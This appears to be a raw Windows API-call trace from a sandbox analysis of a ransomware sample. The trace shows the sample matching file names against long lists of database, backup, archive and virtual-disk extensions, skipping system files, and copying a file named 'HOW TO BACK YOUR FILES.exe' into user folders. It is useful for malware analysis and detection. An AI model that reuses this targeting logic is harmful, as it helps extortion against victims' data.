[0039.774] lstrcmpiW (lpString1="wmv", lpString2="adn") returned 1 [0039.774] lstrlenW (lpString="adp") returned 3 [0039.774] lstrcmpiW (lpString1="wmv", lpString2="adp") returned 1 [0039.774] lstrlenW (lpString="alf") returned 3 [0039.774] lstrcmpiW (lpString1="wmv", lpString2="alf") returned 1 [0039.774] lstrlenW (lpString="ask") returned 3 [0039.775] lstrcmpiW (lpString1="wmv", lpString2="ask") returned 1 [0039.775] lstrlenW (lpString="btr") returned 3 [0039.775] lstrcmpiW (lpString1="wmv", lpString2="btr") returned 1 [0039.775] lstrlenW (lpString="cat") returned 3 [0039.775] lstrcmpiW (lpString1="wmv", lpString2="cat") returned 1 [0039.775] lstrlenW (lpString="cdb") returned 3 [0039.775] lstrcmpiW (lpString1="wmv", lpString2="cdb") returned 1 [0039.775] lstrlenW (lpString="ckp") returned 3 [0039.775] lstrcmpiW (lpString1="wmv", lpString2="ckp") returned 1 [0039.775] lstrlenW (lpString="cma") returned 3 [0039.775] lstrcmpiW (lpString1="wmv", lpString2="cma") returned 1 [0039.775] lstrlenW (lpString="cpd") returned 3 [0039.775] lstrcmpiW (lpString1="wmv", lpString2="cpd") returned 1 [0039.775] lstrlenW (lpString="dacpac") returned 6 [0039.775] lstrcmpiW (lpString1="fe.wmv", lpString2="dacpac") returned 1 [0039.775] lstrlenW (lpString="dad") returned 3 [0039.775] lstrcmpiW (lpString1="wmv", lpString2="dad") returned 1 [0039.775] lstrlenW (lpString="dadiagrams") returned 10 [0039.775] lstrcmpiW (lpString1="ldlife.wmv", lpString2="dadiagrams") returned 1 [0039.775] lstrlenW (lpString="daschema") returned 8 [0039.775] lstrcmpiW (lpString1="life.wmv", lpString2="daschema") returned 1 [0039.775] lstrlenW (lpString="db-journal") returned 10 [0039.775] lstrcmpiW (lpString1="ldlife.wmv", lpString2="db-journal") returned 1 [0039.775] lstrlenW (lpString="db-shm") returned 6 [0039.775] lstrcmpiW (lpString1="fe.wmv", lpString2="db-shm") returned 1 [0039.775] lstrlenW (lpString="db-wal") returned 6 [0039.775] lstrcmpiW (lpString1="fe.wmv", lpString2="db-wal") returned 1 [0039.775] lstrlenW (lpString="dbc") returned 3 [0039.775] lstrcmpiW (lpString1="wmv", lpString2="dbc") returned 1 [0039.775] lstrlenW (lpString="dbs") returned 3 [0039.775] lstrcmpiW (lpString1="wmv", lpString2="dbs") returned 1 [0039.775] lstrlenW (lpString="dbt") returned 3 [0039.776] lstrcmpiW (lpString1="wmv", lpString2="dbt") returned 1 [0039.776] lstrlenW (lpString="dbv") returned 3 [0039.776] lstrcmpiW (lpString1="wmv", lpString2="dbv") returned 1 [0039.776] lstrlenW (lpString="dbx") returned 3 [0039.776] lstrcmpiW (lpString1="wmv", lpString2="dbx") returned 1 [0039.776] lstrlenW (lpString="dcb") returned 3 [0039.776] lstrcmpiW (lpString1="wmv", lpString2="dcb") returned 1 [0039.776] lstrlenW (lpString="dct") returned 3 [0039.776] lstrcmpiW (lpString1="wmv", lpString2="dct") returned 1 [0039.776] lstrlenW (lpString="dcx") returned 3 [0039.776] lstrcmpiW (lpString1="wmv", lpString2="dcx") returned 1 [0039.776] lstrlenW (lpString="ddl") returned 3 [0039.776] lstrcmpiW (lpString1="wmv", lpString2="ddl") returned 1 [0039.776] lstrlenW (lpString="dlis") returned 4 [0039.776] lstrcmpiW (lpString1=".wmv", lpString2="dlis") returned -1 [0039.776] lstrlenW (lpString="dp1") returned 3 [0039.776] lstrcmpiW (lpString1="wmv", lpString2="dp1") returned 1 [0039.776] lstrlenW (lpString="dqy") returned 3 [0039.776] lstrcmpiW (lpString1="wmv", lpString2="dqy") returned 1 [0039.776] lstrlenW (lpString="dsk") returned 3 [0039.776] lstrcmpiW (lpString1="wmv", lpString2="dsk") returned 1 [0039.776] lstrlenW (lpString="dsn") returned 3 [0039.776] lstrcmpiW (lpString1="wmv", lpString2="dsn") returned 1 [0039.776] lstrlenW (lpString="dtsx") returned 4 [0039.776] lstrcmpiW (lpString1=".wmv", lpString2="dtsx") returned -1 [0039.776] lstrlenW (lpString="dxl") returned 3 [0039.776] lstrcmpiW (lpString1="wmv", lpString2="dxl") returned 1 [0039.776] lstrlenW (lpString="eco") returned 3 [0039.776] lstrcmpiW (lpString1="wmv", lpString2="eco") returned 1 [0039.776] lstrlenW (lpString="ecx") returned 3 [0039.776] lstrcmpiW (lpString1="wmv", lpString2="ecx") returned 1 [0039.776] lstrlenW (lpString="edb") returned 3 [0039.776] lstrcmpiW (lpString1="wmv", lpString2="edb") returned 1 [0039.777] lstrlenW (lpString="epim") returned 4 [0039.777] lstrcmpiW (lpString1=".wmv", lpString2="epim") returned -1 [0039.777] lstrlenW (lpString="fcd") returned 3 [0039.777] lstrcmpiW (lpString1="wmv", lpString2="fcd") returned 1 [0039.777] lstrlenW (lpString="fdb") returned 3 [0039.777] lstrcmpiW (lpString1="wmv", lpString2="fdb") returned 1 [0039.777] lstrlenW (lpString="fic") returned 3 [0039.777] lstrcmpiW (lpString1="wmv", lpString2="fic") returned 1 [0039.777] lstrlenW (lpString="flexolibrary") returned 12 [0039.777] lstrlenW (lpString="fm5") returned 3 [0039.777] lstrcmpiW (lpString1="wmv", lpString2="fm5") returned 1 [0039.777] lstrlenW (lpString="fmp") returned 3 [0039.777] lstrcmpiW (lpString1="wmv", lpString2="fmp") returned 1 [0039.777] lstrlenW (lpString="fmp12") returned 5 [0039.777] lstrcmpiW (lpString1="e.wmv", lpString2="fmp12") returned -1 [0039.777] lstrlenW (lpString="fmpsl") returned 5 [0039.777] lstrcmpiW (lpString1="e.wmv", lpString2="fmpsl") returned -1 [0039.777] lstrlenW (lpString="fol") returned 3 [0039.777] lstrcmpiW (lpString1="wmv", lpString2="fol") returned 1 [0039.777] lstrlenW (lpString="fp3") returned 3 [0039.777] lstrcmpiW (lpString1="wmv", lpString2="fp3") returned 1 [0039.777] lstrlenW (lpString="fp4") returned 3 [0039.777] lstrcmpiW (lpString1="wmv", lpString2="fp4") returned 1 [0039.777] lstrlenW (lpString="fp5") returned 3 [0039.777] lstrcmpiW (lpString1="wmv", lpString2="fp5") returned 1 [0039.777] lstrlenW (lpString="fp7") returned 3 [0039.777] lstrcmpiW (lpString1="wmv", lpString2="fp7") returned 1 [0039.777] lstrlenW (lpString="fpt") returned 3 [0039.777] lstrcmpiW (lpString1="wmv", lpString2="fpt") returned 1 [0039.777] lstrlenW (lpString="frm") returned 3 [0039.777] lstrcmpiW (lpString1="wmv", lpString2="frm") returned 1 [0039.777] lstrlenW (lpString="gdb") returned 3 [0039.777] lstrcmpiW (lpString1="wmv", lpString2="gdb") returned 1 [0039.778] lstrlenW (lpString="gdb") returned 3 [0039.778] lstrcmpiW (lpString1="wmv", lpString2="gdb") returned 1 [0039.778] lstrlenW (lpString="grdb") returned 4 [0039.778] lstrcmpiW (lpString1=".wmv", lpString2="grdb") returned -1 [0039.778] lstrlenW (lpString="gwi") returned 3 [0039.778] lstrcmpiW (lpString1="wmv", lpString2="gwi") returned 1 [0039.778] lstrlenW (lpString="hdb") returned 3 [0039.778] lstrcmpiW (lpString1="wmv", lpString2="hdb") returned 1 [0039.778] lstrlenW (lpString="his") returned 3 [0039.778] lstrcmpiW (lpString1="wmv", lpString2="his") returned 1 [0039.778] lstrlenW (lpString="ib") returned 2 [0039.778] lstrcmpiW (lpString1="mv", lpString2="ib") returned 1 [0039.778] lstrlenW (lpString="idb") returned 3 [0039.778] lstrcmpiW (lpString1="wmv", lpString2="idb") returned 1 [0039.778] lstrlenW (lpString="ihx") returned 3 [0039.778] lstrcmpiW (lpString1="wmv", lpString2="ihx") returned 1 [0039.778] lstrlenW (lpString="itdb") returned 4 [0039.778] lstrcmpiW (lpString1=".wmv", lpString2="itdb") returned -1 [0039.778] lstrlenW (lpString="itw") returned 3 [0039.778] lstrcmpiW (lpString1="wmv", lpString2="itw") returned 1 [0039.778] lstrlenW (lpString="jet") returned 3 [0039.778] lstrcmpiW (lpString1="wmv", lpString2="jet") returned 1 [0039.778] lstrlenW (lpString="jtx") returned 3 [0039.778] lstrcmpiW (lpString1="wmv", lpString2="jtx") returned 1 [0039.778] lstrlenW (lpString="kdb") returned 3 [0039.778] lstrcmpiW (lpString1="wmv", lpString2="kdb") returned 1 [0039.778] lstrlenW (lpString="kexi") returned 4 [0039.778] lstrcmpiW (lpString1=".wmv", lpString2="kexi") returned -1 [0039.778] lstrlenW (lpString="kexic") returned 5 [0039.778] lstrcmpiW (lpString1="e.wmv", lpString2="kexic") returned -1 [0039.778] lstrlenW (lpString="kexis") returned 5 [0039.778] lstrcmpiW (lpString1="e.wmv", lpString2="kexis") returned -1 [0039.779] lstrlenW (lpString="lgc") returned 3 [0039.779] lstrcmpiW (lpString1="wmv", lpString2="lgc") returned 1 [0039.779] lstrlenW (lpString="lwx") returned 3 [0039.779] lstrcmpiW (lpString1="wmv", lpString2="lwx") returned 1 [0039.779] lstrlenW (lpString="maf") returned 3 [0039.779] lstrcmpiW (lpString1="wmv", lpString2="maf") returned 1 [0039.779] lstrlenW (lpString="maq") returned 3 [0039.779] lstrcmpiW (lpString1="wmv", lpString2="maq") returned 1 [0039.779] lstrlenW (lpString="mar") returned 3 [0039.779] lstrcmpiW (lpString1="wmv", lpString2="mar") returned 1 [0039.779] lstrlenW (lpString="marshal") returned 7 [0039.779] lstrcmpiW (lpString1="ife.wmv", lpString2="marshal") returned -1 [0039.779] lstrlenW (lpString="mas") returned 3 [0039.779] lstrcmpiW (lpString1="wmv", lpString2="mas") returned 1 [0039.779] lstrlenW (lpString="mav") returned 3 [0039.779] lstrcmpiW (lpString1="wmv", lpString2="mav") returned 1 [0039.779] lstrlenW (lpString="maw") returned 3 [0039.779] lstrcmpiW (lpString1="wmv", lpString2="maw") returned 1 [0039.779] lstrlenW (lpString="mdbhtml") returned 7 [0039.779] lstrcmpiW (lpString1="ife.wmv", lpString2="mdbhtml") returned -1 [0039.779] lstrlenW (lpString="mdn") returned 3 [0039.779] lstrcmpiW (lpString1="wmv", lpString2="mdn") returned 1 [0039.779] lstrlenW (lpString="mdt") returned 3 [0039.779] lstrcmpiW (lpString1="wmv", lpString2="mdt") returned 1 [0039.779] lstrlenW (lpString="mfd") returned 3 [0039.779] lstrcmpiW (lpString1="wmv", lpString2="mfd") returned 1 [0039.779] lstrlenW (lpString="mpd") returned 3 [0039.779] lstrcmpiW (lpString1="wmv", lpString2="mpd") returned 1 [0039.779] lstrlenW (lpString="mrg") returned 3 [0039.779] lstrcmpiW (lpString1="wmv", lpString2="mrg") returned 1 [0039.779] lstrlenW (lpString="mud") returned 3 [0039.779] lstrcmpiW (lpString1="wmv", lpString2="mud") returned 1 [0039.779] lstrlenW (lpString="mwb") returned 3 [0039.780] lstrcmpiW (lpString1="wmv", lpString2="mwb") returned 1 [0039.780] lstrlenW (lpString="myd") returned 3 [0039.780] lstrcmpiW (lpString1="wmv", lpString2="myd") returned 1 [0039.780] lstrlenW (lpString="ndf") returned 3 [0039.780] lstrcmpiW (lpString1="wmv", lpString2="ndf") returned 1 [0039.780] lstrlenW (lpString="nnt") returned 3 [0039.780] lstrcmpiW (lpString1="wmv", lpString2="nnt") returned 1 [0039.780] lstrlenW (lpString="nrmlib") returned 6 [0039.780] lstrcmpiW (lpString1="fe.wmv", lpString2="nrmlib") returned -1 [0039.780] lstrlenW (lpString="ns2") returned 3 [0039.780] lstrcmpiW (lpString1="wmv", lpString2="ns2") returned 1 [0039.780] lstrlenW (lpString="ns3") returned 3 [0039.780] lstrcmpiW (lpString1="wmv", lpString2="ns3") returned 1 [0039.780] lstrlenW (lpString="ns4") returned 3 [0039.780] lstrcmpiW (lpString1="wmv", lpString2="ns4") returned 1 [0039.780] lstrlenW (lpString="nsf") returned 3 [0039.780] lstrcmpiW (lpString1="wmv", lpString2="nsf") returned 1 [0039.780] lstrlenW (lpString="nv") returned 2 [0039.780] lstrcmpiW (lpString1="mv", lpString2="nv") returned -1 [0039.780] lstrlenW (lpString="nv2") returned 3 [0039.780] lstrcmpiW (lpString1="wmv", lpString2="nv2") returned 1 [0039.780] lstrlenW (lpString="nwdb") returned 4 [0039.780] lstrcmpiW (lpString1=".wmv", lpString2="nwdb") returned -1 [0039.780] lstrlenW (lpString="nyf") returned 3 [0039.780] lstrcmpiW (lpString1="wmv", lpString2="nyf") returned 1 [0039.780] lstrlenW (lpString="odb") returned 3 [0039.780] lstrcmpiW (lpString1="wmv", lpString2="odb") returned 1 [0039.780] lstrlenW (lpString="odb") returned 3 [0039.780] lstrcmpiW (lpString1="wmv", lpString2="odb") returned 1 [0039.780] lstrlenW (lpString="oqy") returned 3 [0039.780] lstrcmpiW (lpString1="wmv", lpString2="oqy") returned 1 [0039.780] lstrlenW (lpString="ora") returned 3 [0039.780] lstrcmpiW (lpString1="wmv", lpString2="ora") returned 1 [0039.781] lstrlenW (lpString="orx") returned 3 [0039.781] lstrcmpiW (lpString1="wmv", lpString2="orx") returned 1 [0039.781] lstrlenW (lpString="owc") returned 3 [0039.781] lstrcmpiW (lpString1="wmv", lpString2="owc") returned 1 [0039.781] lstrlenW (lpString="p96") returned 3 [0039.781] lstrcmpiW (lpString1="wmv", lpString2="p96") returned 1 [0039.781] lstrlenW (lpString="p97") returned 3 [0039.781] lstrcmpiW (lpString1="wmv", lpString2="p97") returned 1 [0039.781] lstrlenW (lpString="pan") returned 3 [0039.781] lstrcmpiW (lpString1="wmv", lpString2="pan") returned 1 [0039.781] lstrlenW (lpString="pdb") returned 3 [0039.781] lstrcmpiW (lpString1="wmv", lpString2="pdb") returned 1 [0039.781] lstrlenW (lpString="pdm") returned 3 [0039.781] lstrcmpiW (lpString1="wmv", lpString2="pdm") returned 1 [0039.781] lstrlenW (lpString="pnz") returned 3 [0039.781] lstrcmpiW (lpString1="wmv", lpString2="pnz") returned 1 [0039.781] lstrlenW (lpString="qry") returned 3 [0039.781] lstrcmpiW (lpString1="wmv", lpString2="qry") returned 1 [0039.781] lstrlenW (lpString="qvd") returned 3 [0039.781] lstrcmpiW (lpString1="wmv", lpString2="qvd") returned 1 [0039.781] lstrlenW (lpString="rbf") returned 3 [0039.781] lstrcmpiW (lpString1="wmv", lpString2="rbf") returned 1 [0039.781] lstrlenW (lpString="rctd") returned 4 [0039.781] lstrcmpiW (lpString1=".wmv", lpString2="rctd") returned -1 [0039.781] lstrlenW (lpString="rod") returned 3 [0039.781] lstrcmpiW (lpString1="wmv", lpString2="rod") returned 1 [0039.781] lstrlenW (lpString="rodx") returned 4 [0039.781] lstrcmpiW (lpString1=".wmv", lpString2="rodx") returned -1 [0039.781] lstrlenW (lpString="rpd") returned 3 [0039.781] lstrcmpiW (lpString1="wmv", lpString2="rpd") returned 1 [0039.781] lstrlenW (lpString="rsd") returned 3 [0039.781] lstrcmpiW (lpString1="wmv", lpString2="rsd") returned 1 [0039.781] lstrlenW (lpString="sas7bdat") returned 8 [0039.782] lstrcmpiW (lpString1="life.wmv", lpString2="sas7bdat") returned -1 [0039.782] lstrlenW (lpString="sbf") returned 3 [0039.782] lstrcmpiW (lpString1="wmv", lpString2="sbf") returned 1 [0039.782] lstrlenW (lpString="scx") returned 3 [0039.782] lstrcmpiW (lpString1="wmv", lpString2="scx") returned 1 [0039.782] lstrlenW (lpString="sdb") returned 3 [0039.782] lstrcmpiW (lpString1="wmv", lpString2="sdb") returned 1 [0039.782] lstrlenW (lpString="sdc") returned 3 [0039.782] lstrcmpiW (lpString1="wmv", lpString2="sdc") returned 1 [0039.782] lstrlenW (lpString="sdf") returned 3 [0039.782] lstrcmpiW (lpString1="wmv", lpString2="sdf") returned 1 [0039.782] lstrlenW (lpString="sis") returned 3 [0039.782] lstrcmpiW (lpString1="wmv", lpString2="sis") returned 1 [0039.782] lstrlenW (lpString="spq") returned 3 [0039.782] lstrcmpiW (lpString1="wmv", lpString2="spq") returned 1 [0039.782] lstrlenW (lpString="te") returned 2 [0039.782] lstrcmpiW (lpString1="mv", lpString2="te") returned -1 [0039.782] lstrlenW (lpString="teacher") returned 7 [0039.782] lstrcmpiW (lpString1="ife.wmv", lpString2="teacher") returned -1 [0039.782] lstrlenW (lpString="tmd") returned 3 [0039.782] lstrcmpiW (lpString1="wmv", lpString2="tmd") returned 1 [0039.782] lstrlenW (lpString="tps") returned 3 [0039.782] lstrcmpiW (lpString1="wmv", lpString2="tps") returned 1 [0039.782] lstrlenW (lpString="trc") returned 3 [0039.782] lstrcmpiW (lpString1="wmv", lpString2="trc") returned 1 [0039.782] lstrlenW (lpString="trc") returned 3 [0039.782] lstrcmpiW (lpString1="wmv", lpString2="trc") returned 1 [0039.782] lstrlenW (lpString="trm") returned 3 [0039.782] lstrcmpiW (lpString1="wmv", lpString2="trm") returned 1 [0039.782] lstrlenW (lpString="udb") returned 3 [0039.782] lstrcmpiW (lpString1="wmv", lpString2="udb") returned 1 [0039.782] lstrlenW (lpString="udl") returned 3 [0039.782] lstrcmpiW (lpString1="wmv", lpString2="udl") returned 1 [0039.782] lstrlenW (lpString="usr") returned 3 [0039.783] lstrcmpiW (lpString1="wmv", lpString2="usr") returned 1 [0039.783] lstrlenW (lpString="v12") returned 3 [0039.783] lstrcmpiW (lpString1="wmv", lpString2="v12") returned 1 [0039.783] lstrlenW (lpString="vis") returned 3 [0039.783] lstrcmpiW (lpString1="wmv", lpString2="vis") returned 1 [0039.783] lstrlenW (lpString="vpd") returned 3 [0039.783] lstrcmpiW (lpString1="wmv", lpString2="vpd") returned 1 [0039.783] lstrlenW (lpString="vvv") returned 3 [0039.783] lstrcmpiW (lpString1="wmv", lpString2="vvv") returned 1 [0039.783] lstrlenW (lpString="wdb") returned 3 [0039.783] lstrcmpiW (lpString1="wmv", lpString2="wdb") returned 1 [0039.783] lstrlenW (lpString="wmdb") returned 4 [0039.783] lstrcmpiW (lpString1=".wmv", lpString2="wmdb") returned -1 [0039.783] lstrlenW (lpString="wrk") returned 3 [0039.783] lstrcmpiW (lpString1="wmv", lpString2="wrk") returned -1 [0039.783] lstrlenW (lpString="xdb") returned 3 [0039.783] lstrcmpiW (lpString1="wmv", lpString2="xdb") returned -1 [0039.783] lstrlenW (lpString="xld") returned 3 [0039.783] lstrcmpiW (lpString1="wmv", lpString2="xld") returned -1 [0039.783] lstrlenW (lpString="xmlff") returned 5 [0039.783] lstrcmpiW (lpString1="e.wmv", lpString2="xmlff") returned -1 [0039.783] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80282235, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bda0516, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be12937, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x1907b8a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Wildlife.wmv", cAlternateFileName="")) returned 0 [0039.783] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0039.783] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d22e8 [0039.783] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Public\\Recorded TV", iMaxLength=260 | out: lpString1="C:\\Users\\Public\\Recorded TV") returned="C:\\Users\\Public\\Recorded TV" [0039.783] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0e8 | out: hHeap=0x2b0000) returned 1 [0039.783] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d22e0 | out: hHeap=0x2b0000) returned 1 [0039.783] lstrlenW (lpString="C:\\Users\\Public\\Recorded TV") returned 27 [0039.783] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Public\\Recorded TV" | out: lpString1="C:\\Users\\Public\\Recorded TV") returned="C:\\Users\\Public\\Recorded TV" [0039.784] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0039.784] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Public\\Recorded TV\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\public\\recorded tv\\how to back your files.exe"), bFailIfExists=1) returned 1 [0039.793] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0039.793] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x49627e40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49627e40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0039.793] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.793] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0039.793] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0039.793] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x49627e40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49627e40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.793] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.793] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0039.793] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0039.793] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0039.793] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x89e5e11e, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x89e5e11e, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0039.793] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.793] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0039.793] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0039.793] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0039.793] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0039.793] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0039.793] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0039.793] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0039.793] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0039.793] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0039.793] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0039.793] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0039.793] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0039.793] lstrlenW (lpString="desktop.ini") returned 11 [0039.793] lstrlenW (lpString="C:\\Users\\Public\\Recorded TV\\*") returned 29 [0039.793] lstrcpyW (in: lpString1=0x2e2e898, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0039.794] lstrlenW (lpString="desktop.ini") returned 11 [0039.794] lstrlenW (lpString="Ares865") returned 7 [0039.794] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0039.794] lstrlenW (lpString=".dll") returned 4 [0039.794] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0039.794] lstrlenW (lpString=".lnk") returned 4 [0039.794] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0039.794] lstrlenW (lpString=".ini") returned 4 [0039.794] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0039.794] lstrlenW (lpString=".sys") returned 4 [0039.794] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0039.794] lstrlenW (lpString="desktop.ini") returned 11 [0039.794] lstrlenW (lpString="bak") returned 3 [0039.794] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0039.794] lstrlenW (lpString="ba_") returned 3 [0039.794] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0039.794] lstrlenW (lpString="dbb") returned 3 [0039.794] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0039.794] lstrlenW (lpString="vmdk") returned 4 [0039.794] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0039.794] lstrlenW (lpString="rar") returned 3 [0039.794] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0039.794] lstrlenW (lpString="zip") returned 3 [0039.794] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0039.794] lstrlenW (lpString="tgz") returned 3 [0039.794] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0039.794] lstrlenW (lpString="vbox") returned 4 [0039.794] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0039.794] lstrlenW (lpString="vdi") returned 3 [0039.794] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0039.794] lstrlenW (lpString="vhd") returned 3 [0039.794] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0039.794] lstrlenW (lpString="vhdx") returned 4 [0039.794] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0039.794] lstrlenW (lpString="avhd") returned 4 [0039.795] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0039.795] lstrlenW (lpString="db") returned 2 [0039.795] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0039.795] lstrlenW (lpString="db2") returned 3 [0039.795] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0039.795] lstrlenW (lpString="db3") returned 3 [0039.795] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0039.795] lstrlenW (lpString="dbf") returned 3 [0039.795] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0039.795] lstrlenW (lpString="mdf") returned 3 [0039.795] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0039.795] lstrlenW (lpString="mdb") returned 3 [0039.795] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0039.795] lstrlenW (lpString="sql") returned 3 [0039.795] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0039.795] lstrlenW (lpString="sqlite") returned 6 [0039.795] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0039.795] lstrlenW (lpString="sqlite3") returned 7 [0039.795] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0039.795] lstrlenW (lpString="sqlitedb") returned 8 [0039.795] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0039.795] lstrlenW (lpString="xml") returned 3 [0039.795] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0039.795] lstrlenW (lpString="$er") returned 3 [0039.795] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0039.795] lstrlenW (lpString="4dd") returned 3 [0039.795] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0039.795] lstrlenW (lpString="4dl") returned 3 [0039.795] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0039.795] lstrlenW (lpString="^^^") returned 3 [0039.795] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0039.795] lstrlenW (lpString="abs") returned 3 [0039.795] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0039.795] lstrlenW (lpString="abx") returned 3 [0039.795] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0039.796] lstrlenW (lpString="accdb") returned 5 [0039.796] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0039.796] lstrlenW (lpString="accdc") returned 5 [0039.796] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0039.796] lstrlenW (lpString="accde") returned 5 [0039.796] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0039.796] lstrlenW (lpString="accdr") returned 5 [0039.796] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0039.796] lstrlenW (lpString="accdt") returned 5 [0039.796] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0039.796] lstrlenW (lpString="accdw") returned 5 [0039.796] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0039.796] lstrlenW 